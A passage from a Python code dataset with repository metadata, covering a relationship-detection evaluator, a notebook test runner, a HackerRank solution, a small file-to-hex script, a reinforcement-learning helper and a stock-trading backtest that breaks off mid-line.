det_labels_rel[ind, :1]:\n self.rel_top1_cnt += 1\n\n if gt_labels_sbj[ind] in det_labels_sbj[ind, :5] and \\\n gt_labels_obj[ind] in det_labels_obj[ind, :5] and \\\n gt_labels_rel[ind] in det_labels_rel[ind, :5]:\n self.tri_top5_cnt += 1\n if gt_labels_sbj[ind] in det_labels_sbj[ind, :5]:\n self.sbj_top5_cnt += 1\n if gt_labels_obj[ind] in det_labels_obj[ind, :5]:\n self.obj_top5_cnt += 1\n if gt_labels_rel[ind] in det_labels_rel[ind, :5]:\n self.rel_top5_cnt += 1\n\n if gt_labels_sbj[ind] in det_labels_sbj[ind, :10] and \\\n gt_labels_obj[ind] in det_labels_obj[ind, :10] and \\\n gt_labels_rel[ind] in det_labels_rel[ind, :10]:\n self.tri_top10_cnt += 1\n if gt_labels_sbj[ind] in det_labels_sbj[ind, :10]:\n self.sbj_top10_cnt += 1\n if gt_labels_obj[ind] in det_labels_obj[ind, :10]:\n self.obj_top10_cnt += 1\n if gt_labels_rel[ind] in det_labels_rel[ind, :10]:\n self.rel_top10_cnt += 1\n\n s_correct = gt_labels_sbj[ind] in det_labels_sbj[ind,:self.rank_k]\n p_correct = gt_labels_rel[ind] in det_labels_rel[ind,:self.rank_k]\n o_correct = gt_labels_obj[ind] in det_labels_obj[ind,:self.rank_k]\n spo_correct = s_correct and p_correct and o_correct\n s_ind = np.where(\n det_labels_sbj[ind,:self.rank_k].squeeze() == \\\n gt_labels_sbj[ind])[0]\n p_ind = np.where(\n det_labels_rel[ind,:self.rank_k].squeeze() == \\\n gt_labels_rel[ind])[0]\n o_ind = np.where(\n det_labels_obj[ind,:self.rank_k].squeeze() == \\\n gt_labels_obj[ind])[0]\n\n self.sbj_mr += 1\n self.rel_mr += 1\n self.obj_mr += 1\n self.tri_mr += 1\n if s_correct:\n s_ind = s_ind[0]\n self.sbj_rr += 1.0 / (s_ind + 1.0)\n self.sbj_mr += s_ind / float(self.rank_k) - 1\n if p_correct:\n p_ind = p_ind[0]\n self.rel_rr += 1.0 / (p_ind + 1.0)\n self.rel_mr += p_ind / float(self.rank_k) - 1\n if o_correct:\n o_ind = o_ind[0]\n self.obj_rr += 1.0 / (o_ind + 1.0)\n self.obj_mr += o_ind / float(self.rank_k) - 1\n if spo_correct:\n self.tri_rr += (1.0 / (s_ind + 1.0) + \\\n 1.0 / (p_ind + 1.0) + \\\n 1.0 / (o_ind + 1.0)) / 3.0\n self.tri_mr += (s_ind / float(self.rank_k) - 1 + \\\n p_ind / float(self.rank_k) - 1 + \\\n o_ind / float(self.rank_k) - 1) / 3.0\n\n sbj_k = 1\n # rel_k = 70\n obj_k = 1\n # det_labels = []\n # det_boxes = []\n # gt_labels = []\n # gt_boxes = []\n for i, rel_k in enumerate(self.all_rel_k):\n if det_labels_sbj.shape[0] > 0:\n topk_labels_sbj = det_labels_sbj[:, :sbj_k]\n topk_labels_rel = det_labels_rel[:, :rel_k]\n topk_labels_obj = det_labels_obj[:, :obj_k]\n else: # In the ECCV2016 proposals sometimes there is no det box\n topk_labels_sbj = np.zeros((0, sbj_k), dtype=np.int32)\n topk_labels_rel = np.zeros((0, rel_k), dtype=np.int32)\n topk_labels_obj = np.zeros((0, obj_k), dtype=np.int32)\n\n if det_scores_sbj.shape[0] > 0:\n topk_scores_sbj = det_scores_sbj[:, :sbj_k]\n topk_scores_rel = det_scores_rel[:, :rel_k]\n topk_scores_obj = det_scores_obj[:, :obj_k]\n else: # In the ECCV2016 proposals sometimes there is no det box\n topk_scores_sbj = np.zeros((0, sbj_k), dtype=np.float32)\n topk_scores_rel = np.zeros((0, rel_k), dtype=np.float32)\n topk_scores_obj = np.zeros((0, obj_k), dtype=np.float32)\n\n topk_cube_spo_labels = np.zeros(\n (topk_labels_sbj.shape[0], sbj_k * obj_k * rel_k, 3), dtype=np.int32)\n topk_cube_spo_scores = np.zeros(\n (topk_labels_sbj.shape[0], sbj_k * obj_k * rel_k), dtype=np.float32)\n topk_cube_p_scores = np.zeros(\n (topk_labels_sbj.shape[0], sbj_k * obj_k * rel_k), dtype=np.float32)\n for l in range(sbj_k):\n for m in range(rel_k):\n for n in range(obj_k):\n topk_cube_spo_labels[:, l * rel_k * obj_k + m * obj_k + n, 0] = \\\n topk_labels_sbj[:, l]\n topk_cube_spo_labels[:, l * rel_k * obj_k + m * obj_k + n, 1] = \\\n topk_labels_rel[:, m]\n topk_cube_spo_labels[:, l * rel_k * obj_k + m * obj_k + n, 2] = \\\n topk_labels_obj[:, n]\n topk_cube_spo_scores[:, l * rel_k * obj_k + m * obj_k + n] = \\\n np.exp(topk_scores_sbj[:, l] +\n topk_scores_rel[:, m] +\n topk_scores_obj[:, n])\n\n topk_cube_p_scores[:, l * rel_k * obj_k + m * obj_k + n] = \\\n np.exp(topk_scores_rel[:, m])\n\n topk_cube_spo_labels_reshape = topk_cube_spo_labels.reshape((-1, 3))\n topk_cube_spo_scores_reshape = topk_cube_spo_scores.reshape((-1, 1))\n\n self.all_det_labels[i].append(\n np.concatenate((topk_cube_spo_scores_reshape[:, 0, np.newaxis],\n topk_cube_spo_labels_reshape[:, 0, np.newaxis],\n topk_cube_spo_labels_reshape[:, 1, np.newaxis],\n topk_cube_spo_labels_reshape[:, 2, np.newaxis]),\n axis=1))\n self.all_det_boxes[i].append(np.repeat(\n np.concatenate((det_boxes_sbj[:, np.newaxis, :],\n det_boxes_obj[:, np.newaxis, :]),\n axis=1), sbj_k * rel_k * obj_k, axis=0))\n self.all_gt_labels[i].append(\n np.concatenate((gt_labels_sbj[:, np.newaxis],\n gt_labels_rel[:, np.newaxis],\n gt_labels_obj[:, np.newaxis]),\n axis=1))\n self.all_gt_boxes[i].append(\n np.concatenate((gt_boxes_sbj[:, np.newaxis, :],\n gt_boxes_obj[:, np.newaxis, :]),\n axis=1))\n\n return new_batch_flag\n\n def calculate_and_plot_accuracy(self):\n\n if self._split != 'test':\n self.tri_top1_acc = float(self.tri_top1_cnt) / float(self.spo_cnt) * 100\n self.tri_top5_acc = float(self.tri_top5_cnt) / float(self.spo_cnt) * 100\n self.tri_top10_acc = float(self.tri_top10_cnt) / float(self.spo_cnt) * 100\n self.sbj_top1_acc = float(self.sbj_top1_cnt) / float(self.spo_cnt) * 100\n self.sbj_top5_acc = float(self.sbj_top5_cnt) / float(self.spo_cnt) * 100\n self.sbj_top10_acc = float(self.sbj_top10_cnt) / float(self.spo_cnt) * 100\n self.obj_top1_acc = float(self.obj_top1_cnt) / float(self.spo_cnt) * 100\n self.obj_top5_acc = float(self.obj_top5_cnt) / float(self.spo_cnt) * 100\n self.obj_top10_acc = float(self.obj_top10_cnt) / float(self.spo_cnt) * 100\n self.rel_top1_acc = float(self.rel_top1_cnt) / float(self.spo_cnt) * 100\n self.rel_top5_acc = float(self.rel_top5_cnt) / float(self.spo_cnt) * 100\n self.rel_top10_acc = float(self.rel_top10_cnt) / float(self.spo_cnt) * 100\n self.sbj_mr /= float(self.spo_cnt) / 100\n self.rel_mr /= float(self.spo_cnt) / 100\n self.obj_mr /= float(self.spo_cnt) / 100\n self.tri_mr /= float(self.spo_cnt) / 100\n self.sbj_rr /= float(self.spo_cnt) / 100\n self.rel_rr /= float(self.spo_cnt) / 100\n self.obj_rr /= float(self.spo_cnt) / 100\n self.tri_rr /= float(self.spo_cnt) / 100\n\n print('triplet top 1 accuracy: {:f}'.format(self.tri_top1_acc))\n print('triplet top 5 accuracy: {:f}'.format(self.tri_top5_acc))\n print('triplet top 10 accuracy: {:f}'.format(self.tri_top10_acc))\n print('triplet rr: {:f}'.format(self.tri_rr))\n print('triplet mr: {:f}'.format(self.tri_mr))\n\n print('sbj top 1 accuracy: {:f}'.format(self.sbj_top1_acc))\n print('sbj top 5 accuracy: {:f}'.format(self.sbj_top5_acc))\n print('sbj top 10 accuracy: {:f}'.format(self.sbj_top10_acc))\n print('sbj rr: {:f}'.format(self.sbj_rr))\n print('sbj mr: {:f}'.format(self.sbj_mr))\n\n print('obj top 1 accuracy: {:f}'.format(self.obj_top1_acc))\n print('obj top 5 accuracy: {:f}'.format(self.obj_top5_acc))\n print('obj top 10 accuracy: {:f}'.format(self.obj_top10_acc))\n print('obj rr: {:f}'.format(self.obj_rr))\n print('obj mr: {:f}'.format(self.obj_mr))\n\n print('rel top 1 accuracy: {:f}'.format(self.rel_top1_acc))\n print('rel top 5 accuracy: {:f}'.format(self.rel_top5_acc))\n print('rel top 10 accuracy: {:f}'.format(self.rel_top10_acc))\n print('rel rr: {:f}'.format(self.rel_rr))\n print('rel mr: {:f}'.format(self.rel_mr))\n\n all_accs = {}\n for key, val in self.__dict__.items():\n if key.find('acc') >= 0:\n all_accs[key] = val\n return all_accs\n\n def save_all_dets(self):\n\n output_dir = helpers_rel.get_output_directory()\n det_path = os.path.join(\n output_dir,\n cfg.DATASET,\n cfg.MODEL.TYPE, cfg.MODEL.SUBTYPE, cfg.MODEL.SPECS, cfg.TEST.DATA_TYPE)\n if not os.path.exists(det_path):\n os.makedirs(det_path)\n det_name = 'reldn_detections.pkl'\n det_file = os.path.join(det_path, det_name)\n logger.info('all_dets size: {}'.format(len(self.all_dets['labels_sbj'])))\n with open(det_file, 'wb') as f:\n pickle.dump(self.all_dets, f, pickle.HIGHEST_PROTOCOL)\n logger.info('Wrote reldn detections to {}'.format(os.path.abspath(det_file)))\n\n if cfg.TEST.GET_ALL_LAN_EMBEDDINGS:\n all_obj_lan_embds_name = 'all_obj_lan_embds.pkl'\n all_obj_lan_embds_file = os.path.join(det_path, all_obj_lan_embds_name)\n logger.info('all_obj_lan_embds size: {}'.format(\n self.all_obj_lan_embds.shape[0]))\n with open(all_obj_lan_embds_file, 'wb') as f:\n pickle.dump(self.all_obj_lan_embds, f, pickle.HIGHEST_PROTOCOL)\n logger.info('Wrote all_obj_lan_embds to {}'.format(\n os.path.abspath(all_obj_lan_embds_file)))\n\n all_prd_lan_embds_name = 'all_prd_lan_embds.pkl'\n all_prd_lan_embds_file = os.path.join(det_path, all_prd_lan_embds_name)\n logger.info('all_prd_lan_embds size: {}'.format(\n self.all_prd_lan_embds.shape[0]))\n with open(all_prd_lan_embds_file, 'wb') as f:\n pickle.dump(self.all_prd_lan_embds, f, pickle.HIGHEST_PROTOCOL)\n logger.info('Wrote all_prd_lan_embds to {}'.format(\n os.path.abspath(all_prd_lan_embds_file)))\n\n if cfg.TEST.GET_ALL_VIS_EMBEDDINGS:\n all_sbj_vis_embds_name = 'all_sbj_vis_embds.pkl'\n all_sbj_vis_embds_file = os.path.join(det_path, all_sbj_vis_embds_name)\n logger.info('all_sbj_vis_embds size: {}'.format(\n len(self.all_sbj_vis_embds)))\n with open(all_sbj_vis_embds_file, 'wb') as f:\n pickle.dump(self.all_sbj_vis_embds, f, pickle.HIGHEST_PROTOCOL)\n logger.info('Wrote all_sbj_vis_embds to {}'.format(\n os.path.abspath(all_sbj_vis_embds_file)))\n\n all_obj_vis_embds_name = 'all_obj_vis_embds.pkl'\n all_obj_vis_embds_file = os.path.join(det_path, all_obj_vis_embds_name)\n logger.info('all_obj_vis_embds size: {}'.format(\n len(self.all_obj_vis_embds)))\n with open(all_obj_vis_embds_file, 'wb') as f:\n pickle.dump(self.all_obj_vis_embds, f, pickle.HIGHEST_PROTOCOL)\n logger.info('Wrote all_obj_vis_embds to {}'.format(\n os.path.abspath(all_obj_vis_embds_file)))\n\n all_prd_vis_embds_name = 'all_prd_vis_embds.pkl'\n all_prd_vis_embds_file = os.path.join(det_path, all_prd_vis_embds_name)\n logger.info('all_prd_vis_embds size: {}'.format(\n len(self.all_prd_vis_embds)))\n with open(all_prd_vis_embds_file, 'wb') as f:\n pickle.dump(self.all_prd_vis_embds, f, pickle.HIGHEST_PROTOCOL)\n logger.info('Wrote all_prd_vis_embds to {}'.format(\n os.path.abspath(all_prd_vis_embds_file)))\n","repo_name":"facebookresearch/Large-Scale-VRD","sub_path":"lib/utils/evaluator_rel.py","file_name":"evaluator_rel.py","file_ext":"py","file_size_in_byte":24671,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"21"} +{"seq_id":"8319309591","text":"import base64\nimport struct\nimport binascii\ndef convertFileToOneAndZero(path):\n\n\n f = open(path,'rb')\n for chunk in iter(lambda: f.read(), b''):\n #print(''.join(['{:b}'.format(c) for c in chunk]), end='')\n a = ''.join(['{:b}'.format(c) for c in chunk])\n #hexstr = binascii.b2a_hex(a)\n #print(hexstr)\n #b=int(a,2)\n #print(hex(int(a,2)))\n text = hex(int(a,2))\n b_text = bytes(text, encoding=\"utf8\")\n print(b_text)\n print(todecond(text))\n\n\ndef todecond(a):\n return ''.join([chr(int(b, 16)) for b in [a[i:i + 2] for i in range(0, len(a), 2)]])\nif __name__ == '__main__':\n path ='C:/Users/hp/Desktop/package-lock.json'\n convertFileToOneAndZero(path)","repo_name":"JKFjkf/Practise","sub_path":"文本转换/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16445506295","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'sockMerchant' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER n\n# 2. INTEGER_ARRAY ar\n#\n\ndef sockMerchant(n, ar):\n # Write your code here\n pairCount = 0 \n seen = {}\n # iterate through the list\n # if not seen in {}, add it to {}\n for sock in ar:\n if sock not in seen:\n seen[sock] = 1\n else:\n seen[sock] += 1\n \n for k, v in seen.items():\n if v % 2 == 0: \n pairCount += v / 2\n if v % 2 != 0 and v > 2:\n pairCount += int( v / 2 )\n print(seen)\n return pairCount\n\nif __name__ == '__main__':\n # fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = 9\n\n ar = [10, 20, 20, 10, 10, 30, 50, 10, 20]\n\n result = sockMerchant(n, ar)\n print(result)\n # fptr.write(str(result) + '\\n')\n\n # fptr.close()\n","repo_name":"tinkitwong/hackerrrank","sub_path":"InterviewPrepKit/WarmUp/socks.py","file_name":"socks.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41000980310","text":"\"\"\" Run multiple notebooks. \"\"\"\n# pylint: disable=import-error\nimport os\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"6\"\n\nimport warnings\nfrom glob import glob\nimport pytest\nimport torch\n\n\n\nNO_GPU = pytest.mark.skipif(not torch.cuda.is_available(), reason='No GPU')\n\nNOTEBOOKS_DIR = './notebooks/'\nNOTEBOOKS = glob(NOTEBOOKS_DIR + '*.ipynb')\n\nTUTORIALS_DIR = './../../examples/tutorials/'\nTUTORIALS = glob(TUTORIALS_DIR + '*.ipynb')\nALLOWED_TUTORIALS = [\n '01',\n '02', # quite long\n # '03', # very long\n '04',\n '07',\n # '10', # requires `multiprocess` module\n]\n\nMICROBATCH_LIST = [None, 8] # each integer values must be a divisor of 16\nDEVICE_LIST = ['CPU:0', pytest.param('GPU:*', marks=NO_GPU)] # set your own value(s) for used devices\n\nPARAMETERS = []\n# Run every notebook in test directory for every combination of microbatching\nPARAMETERS += [(path, mb) for path in NOTEBOOKS\n for mb in MICROBATCH_LIST]\n\n# Run selected notebooks inside tutorials dir without microbatching\nPARAMETERS += [(path, None) for path in TUTORIALS\n if path.split('/')[-1][:2] in ALLOWED_TUTORIALS]\n\n_ = [print(item) for item in PARAMETERS]\n\n\n# Some of the actions are appropriate in notebooks, but better be ignored in tests\nBAD_PREFIXES = ['get_ipython', 'plt', 'plot', 'figure', 'ax.',]\n\n\n@pytest.mark.slow\n@pytest.mark.parametrize('path, microbatch', PARAMETERS)\n@pytest.mark.parametrize('device', DEVICE_LIST)\ndef test_run_notebooks(path, microbatch, device):\n \"\"\" There are a lot of examples in different notebooks, and all of them should be working.\n\n Parameters\n ----------\n path : str\n Location of notebook to run.\n\n microbatch : int or None\n If None, then no microbatch is applied.\n If int, then size of microbatch used.\n\n device : str or None\n If None, then default device behaviour is used.\n If str, then any option of device configuration from :class:`.torch.TorchModel` is supported.\n\n Notes\n -----\n `device` is moved to separate parameter in order to work properly with `parametrize`.\n \"\"\"\n # pylint: disable=exec-used\n if path.startswith(TUTORIALS_DIR) and 'CPU' not in device:\n pytest.skip(\"Tutorials don't utilize device config.\")\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n from nbconvert import PythonExporter\n code, _ = PythonExporter().from_filename(path)\n\n code_ = []\n for line in code.split('\\n'):\n if not line.startswith('#'):\n flag = sum([name in line for name in BAD_PREFIXES])\n if flag == 0:\n code_.append(line)\n\n code = '\\n'.join(code_)\n exec(code, {'MICROBATCH': microbatch, 'DEVICE': device})\n","repo_name":"analysiscenter/batchflow","sub_path":"batchflow/tests/notebooks_test.py","file_name":"notebooks_test.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":194,"dataset":"github-code","pt":"21"} +{"seq_id":"41388577116","text":"import numpy as np\n\n## Toma un vector de los valores de las acciones y retorna un vector de\n## probabilidades con la probabilidad distribuida equitativamente sobre las\n## acciones óptimas\ndef optimalize(value_array):\n best = np.flatnonzero(value_array == value_array.max())\n ret = np.array([1/len(best) if (x == value_array.max()) \\\n else 0.0 for x in value_array])\n return ret\n","repo_name":"BibarelUsedFly/reinforcement-learning","sub_path":"dynamic programming/Reinforce.py","file_name":"Reinforce.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19637600262","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 26 11:20:01 2022\n\n@author: Richard\n\"\"\"\n\nimport yfinance as yf\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nimport math\nfrom datetime import date\n\n#get prices from yahoo finance\n\ntday = date.today()\ntday_str = tday.strftime(\"%Y-%m-%d\")\n\ntickers = \"EVO.ST \"\\\n\"ORRON.ST \"\\\n\"INVE-B.ST \"\\\n\"HM-B.ST \"\\\n\"ERIC-B.ST \"\\\n\"NDA-SE.ST \"\\\n\"AZN.ST \"\\\n\"VOLV-B.ST \"\\\n\"GETI-B.ST \"\\\n\"SAND.ST \"\\\n\"SWMA.ST \"\\\n\"ATCO-A.ST \"\\\n\"SWED-A.ST \"\\\n\"BOL.ST \"\\\n\"ESSITY-B.ST \"\\\n\"SEB-A.ST \"\\\n\"EMBRAC-B.ST \"\\\n\"SINCH.ST \"\\\n\"ASSA-B.ST \"\\\n\"HEXA-B.ST \"\\\n\"ABB.ST \"\\\n\"NIBE-B.ST \"\\\n\"EQT.ST \"\\\n\"SKF-B.ST \"\\\n\"VOLCAR-B.ST \"\\\n\"ELUX-B.ST \"\\\n\"TELIA.ST \"\\\n\"SBB-B.ST \"\\\n\"SHB-A.ST \"\\\n\"LIFCO-B.ST \"\\\n\"SAGA-B.ST \"\\\n\"TEL2-B.ST \"\\\n\"ALFA.ST \"\\\n\"ATCO-B.ST \"\\\n\"CAST.ST \"\\\n\"ONCO.ST \"\\\n\"SSAB-B.ST \"\\\n\"SCA-B.ST \"\\\n\"ALIV-SDB.ST \"\\\n\"KINV-B.ST \"\\\n\"EPI-A.ST \"\\\n\"HUSQ-B.ST \"\\\n\"SKA-B.ST \"\\\n\"SF.ST \"\\\n\"BALD-B.ST \"\\\n\"SOBI.ST \"\\\n\"TIGO-SDB.ST \"\\\n\"NIVI-B.ST \"\\\n\"HTRO.ST \"\\\n\"TREL-B.ST \"\\\n\"SECU-B.ST \"\\\n\"INDU-C.ST \"\\\n\"EKTA-B.ST \"\\\n\"KIND-SDB.ST \"\\\n\"SSAB-A.ST \"\\\n\"LUND-B.ST \"\\\n\"AZA.ST \"\\\n\"LATO-B.ST \"\\\n\"SAVE.ST \"\\\n\"EPI-B.ST \"\\\n\"STOR-B.ST \"\\\n\"AXFO.ST \"\\\n\"PCELL.ST \"\\\n\"KLARA-B.ST \"\\\n\"SHOT.ST \"\\\n\"DOM.ST \"\\\n\"SECT-B.ST \"\\\n\"INDT.ST \"\\\n\"BICO.ST \"\\\n\"ADDT-B.ST \"\\\n\"BILL.ST \"\\\n\"CTEK.ST \"\\\n\"TRUE-B.ST \"\\\n\"THULE.ST \"\\\n\"FABG.ST \"\\\n\"HOLM-B.ST \"\\\n\"HUFV-A.ST \"\\\n\"ALIF-B.ST \"\\\n\"INTRUM.ST \"\\\n\"KAMBI.ST \"\\\n\"SAS.ST \"\\\n\"MIPS.ST \"\\\n\"FING-B.ST \"\\\n\"VESTUM.ST \"\\\n\"AAK.ST \"\\\n\"VITR.ST \"\\\n\"WIHL.ST \"\\\n\"HUMBLE.ST \"\\\n\"BHG.ST \"\\\n\"JM.ST \"\\\n\"AEGIR.ST \"\\\n\"INSTAL.ST \"\\\n\"BEIJ-B.ST \"\\\n\"SAAB-B.ST \"\\\n\"HPOL-B.ST \"\\\n\"CTM.ST \"\\\n\"STORY-B.ST \"\\\n\"BOOZT.ST \"\\\n\"CIBUS.ST \"\\\n\"LIAB.ST \"\\\n\"NYF.ST \"\\\n\"VNV.ST \"\\\n\"WALL-B.ST \"\\\n\"STE-R.ST \"\\\n\"CINT.ST \"\\\n\"BETS-B.ST \"\\\n\"SWEC-B.ST \"\\\n\"NETI-B.ST \"\\\n\"HEM.ST \"\\\n\"VIT-B.ST \"\\\n\"VIMIAN.ST \"\\\n\"BURE.ST \"\\\n\"RATO-B.ST \"\\\n\"DIOS.ST \"\\\n\"PNDX-B.ST \"\\\n\"LOOMIS.ST \"\\\n\"AFRY.ST \"\\\n\"LUMI.ST \"\\\n\"SUS.ST \"\\\n\"PDX.ST \"\\\n\"NEWA-B.ST \"\\\n\"NCC-B.ST \"\\\n\"SECARE.ST \"\\\n\"ARJO-B.ST \"\\\n\"ATRLJ-B.ST \"\\\n\"CORE-B.ST \"\\\n\"COOR.ST \"\\\n\"MEKO.ST \"\\\n\"BMAX.ST \"\\\n\"SDIP-B.ST \"\\\n\"IPCO.ST \"\\\n\"CATE.ST \"\\\n\"CALTX.ST \"\\\n\"TROAX.ST \"\\\n\"NOLA-B.ST \"\\\n\"LOGI-B.ST \"\\\n\"BUFAB.ST \"\\\n\"LAGR-B.ST \"\\\n\"SKIS-B.ST \"\\\n\"MTG-B.ST \"\\\n\"PEAB-B.ST \"\\\n\"MYCR.ST \"\\\n\"CLAS-B.ST \"\\\n\"SYNSAM.ST \"\\\n\"AOI.ST \"\\\n\"HMS.ST \"\\\n\"ANOD-B.ST \"\\\n\"BRAV.ST \"\\\n\"SVOL-B.ST \"\\\n\"BILI-A.ST \"\\\n\"BIOT.ST \"\\\n\"TOBII.ST \"\\\n\"RESURS.ST \"\\\n\"SCST.ST \"\\\n\"G5EN.ST \"\\\n\"RVRC.ST \"\\\n\"BONAV-B.ST \"\\\n\"GRNG.ST \"\\\n\"NOBI.ST \"\\\n\"BETCO.ST \"\\\n\"NCAB.ST \"\\\n\"VOLO.ST \"\\\n\"JOMA.ST \"\\\n\"INWI.ST \"\\\n\"EOLU-B.ST \"\\\n\"MTRS.ST \"\\\n\"HNSA.ST \"\\\n\"CRED-A.ST \"\\\n\"EXS.ST \"\\\n\"NOTE.ST \"\\\n\"NP3.ST \"\\\n\"GARO.ST \"\\\n\"BIOA-B.ST \"\\\n\"RENEW.ST \"\\\n\"FNM.ST \"\\\n\"OX2.ST \"\\\n\"CLA-B.ST \"\\\n\"SEYE.ST \"\\\n\"MCOV-B.ST \"\\\n\"EPRO-B.ST \"\\\n\"DSNO.ST \"\\\n\"COIC.ST \"\\\n\"COALA.ST \"\\\n\"ENQ.ST \"\\\n\"DUST.ST \"\\\n\"BALCO.ST \"\\\n\"TRANS.ST \"\\\n\"AMBEA.ST \"\\\n\"COLL.ST \"\\\n\"KNOW.ST \"\\\n\"TETY.ST \"\\\n\"SOLT.ST \"\\\n\"CAMX.ST \"\\\n\"ATT.ST \"\\\n\"AAC.ST \"\\\n\"ALIG.ST \"\\\n\"8TRA.ST \"\\\n\"ACAD.ST \"\\\n\"GENO.ST \"\\\n\"CANTA.ST \"\\\n\"BEIA-B.ST \"\\\n\"SIGNUP.ST \"\\\n\"BFG.ST \"\\\n\"FG.ST \"\\\n\"IVACC.ST \"\\\n\"EG7.ST \"\\\n\"SEDANA.ST \"\\\n\"ACCON.ST \"\\\n\"NWG.ST \"\\\n\"ACAST.ST \"\\\n\"XVIVO.ST \"\\\n\"OEM-B.ST \"\\\n\"BONEX.ST \"\\\n\"SIVE.ST \"\\\n\"THUNDR.ST \"\\\n\"AZELIO.ST \"\\\n\"CEVI.ST \"\\\n\"HANZA.ST \"\\\n\"BERG-B.ST \"\\\n\"TFBANK.ST \"\\\n\"ASAB.ST \"\\\n\"BRG-B.ST \"\\\n\"BULTEN.ST \"\\\n\"BIOG-B.ST \"\\\n\"BUSER.ST \"\\\n\"KFAST-B.ST \"\\\n\"IMP-A-SDB.ST \"\\\n\"FLAT-B.ST \"\\\n\"KAR.ST \"\\\n\"IMMNOV.ST \"\\\n\"DOXA.ST \"\\\n\"LUG.ST \"\\\n\"CS.ST \"\\\n\"GREEN.ST \"\\\n\"READ.ST \"\\\n\"PRIC-B.ST \"\\\n\"MAHA-A.ST \"\\\n\"HUM.ST \"\\\n\"BTS-B.ST \"\\\n\"FASTAT.ST \"\\\n\"STEF-B.ST \"\\\n\"FPIP.ST \"\\\n\"VEFAB.ST \"\\\n\"CAT-B.ST \"\\\n\"FAG.ST \"\\\n\"CDON.ST \"\\\n\"LINC.ST \"\\\n\"MCAP.ST \"\\\n\"HOFI.ST \"\\\n\"RAY-B.ST \"\\\n\"EAST.ST \"\\\n\"DUNI.ST \"\\\n\"IDUN-B.ST \"\\\n\"PLAZ-B.ST \"\\\n\"BEGR.ST \"\\\n\"AWRD.ST \"\\\n\"ENGCON-B.ST \"\\\n\"EQT.ST \" \\\n\"VPLAY-B.ST \"\\\n\"AQ.ST \" \\\n\"ARION-SDB.ST \" \\\n\"BACTI-B.ST \" \\\n\"BESQ.ST \" \\\n\"BRIN-B.ST \" \\\n\"CCC.ST \" \\\n\"COALA.ST \" \\\n\"CTT.ST \" \\\n\"ELAN-B.ST \" \\\n\"ELTEL.ST \" \\\n\"ENEA.ST \" \\\n\"FOI-B.ST \" \\\n\"HEBA-B.ST \" \\\n\"IAR-B.ST \" \\\n\"IVSO.ST \" \\\n\"LIME.ST \" \\\n\"LUC.ST \" \\\n\"MMGR-B.ST \" \\\n\"NMAN.ST \" \\\n\"NPAPER.ST \" \\\n\"ORES.ST \" \\\n\"PACT.ST \" \\\n\"PROB.ST \" \\\n\"QLINEA.ST \" \\\n\"REJL-B.ST \" \\\n\"RROS.ST \" \\\n\"SYSR.ST \" \\\n\"TIETOS.ST \" \\\n\"TRAC-B.ST \" \\\n\"TRIAN-B.ST \" \\\n\"VBG-B.ST \" \\\n\"XANO-B.ST \" \\\n\"CINIS.ST \" \\\n\"MSON-B.ST \" \\\n\"EMIL-B.ST \" \\\n\"SLP-B.ST \" \\\n\"4C.ST \" \\\n\"XSPRAY.ST\"\n\n\n#=============================================================================\n# ============================================================================\nhist = yf.download(tickers, start='2015-01-01', end=tday_str)\n# ============================================================================\n#=============================================================================\n\n\nclose_prices = hist[\"Adj Close\"]#.dropna(how='all').fillna(0)\nvolumes = hist[\"Volume\"].dropna(how='all').fillna(0)\n\nr_vol=volumes/volumes.rolling(20).mean().shift(1)\n\n\n#add current price\n#close_prices = close_prices.drop('2020-01-01')\n# =============================================================================\n# =============================================================================\n# index = close_prices.index.append(pd.Index([tday]))\n# \n# close_prices = close_prices.append(pd.Series(), ignore_index=True)\n# close_prices=close_prices.set_index(index)\n# \n# re_names_df = re_names.split(\" \")\n# for x in re_names_df:\n# stock_data = yf.Ticker(x)\n# curr_mid = (stock_data.info[\"bid\"] + stock_data.info[\"ask\"])/2\n# close_prices.loc[close_prices.tail(1).index,x] = curr_mid\n# =============================================================================\n\n# =============================================================================\n\n#calculate daily returns\nret_daily = close_prices.pct_change()\nvol_daily = ret_daily.rolling(60).std().shift(1)\n\n\n#create binary dataframe to exclude stocks with big move large volume days in the last n sessions\nlong_ind = (r_vol > 3) & (ret_daily > 0) & (ret_daily < 0.08)\n \n# #create position indicator df\n# long_ind = significant_days.shift(1)\n\n#long_ind = (ret_5d < 0) \n#replace false with NaN to avoid 0s impacting the mean\nlong_ind = long_ind.replace(False, np.nan)\n\n\nshort_ind = (r_vol > 3.5) & (ret_daily < -0.1) & (ret_daily > -0.3)\nshort_ind = short_ind.replace(False, np.nan)\n\n\n\n#calc transaction cost\nn_trans = long_ind.sum().sum() #+ short_ind.sum().sum()\n\ntrans_value = n_trans*100000\ntotal_trans_cost = n_trans*29\n\ntrans_proc_fee = total_trans_cost/trans_value\n\n\nlong_returns_daily = 1*(ret_daily)*long_ind.shift(1)\nshort_returns_daily = -1*(ret_daily+2*trans_proc_fee)*short_ind.shift(1)\n\n\n#daily returns of long short strategy\n#avg_long_ret = starting_capital*long_returns_daily.mean(axis=1)-transaction_cost\navg_long_ret = long_returns_daily[long_returns_daily!=0].mean(axis=1)#-2*trans_proc_fee\n\n#strat_vol = avg_long_ret.shift(1).rolling(20).std()\n\navg_short_ret = short_returns_daily[short_returns_daily!=0].mean(axis=1)#-2*trans_proc_fee\ndaily_returns_strat =avg_long_ret.dropna(how='all').fillna(0) #+ avg_short_ret.dropna(how='all').fillna(0)#\ndaily_returns_strat = 